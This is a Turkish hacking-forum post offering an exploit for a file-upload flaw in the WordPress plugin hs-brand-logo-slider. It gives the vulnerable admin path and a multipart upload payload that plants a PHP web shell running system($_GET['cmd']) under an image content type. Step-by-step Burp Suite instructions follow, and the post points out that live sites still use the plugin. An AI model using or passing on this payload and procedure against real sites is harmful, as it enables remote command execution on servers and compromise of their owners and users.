Hoşgeldin Misafir

Wordpress Banner Logodan Shell Atma /Exploit

Reisci

Reisci

Yerli Ve Milli Hacker
11 Mar 2020
6,569 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Wordpress banner image upload üzerinden shell atma. Efsane bir zafiyet ve exploit

# Exploit Author: Net-Hunter
# Google Dork: N/A
# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/

Zafiyetli olduğu için github linki disabled fakat hala kullanan siteler var.

Evet arkadaşlar wp banner image upload alanında shell atmayı bulmuşlar.

Sağlam bir zafiyet şimdi kullanımına geçelim.

Açıklı dosya dizinimiz;

"" /wp-admin/admin.php?page=hs-brand-logo-slider.php ""

Bu yazılımdaki Açıklı dosya dizinimiz.

Zafiyet ve kullanımı:
Content-Disposition: form-data; name="logoupload"; filename="a.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?>

Detaylı PoC:
1- Hesabınızla bu yazılıma giriş yapıyorsunuz.

2- Burp Suite üzerinden image upload ederken Forward yapıp resim.jpg yi resim.php (shell)
olarak güncelliyorsunuz.

3- Shellimiz atıldı... :)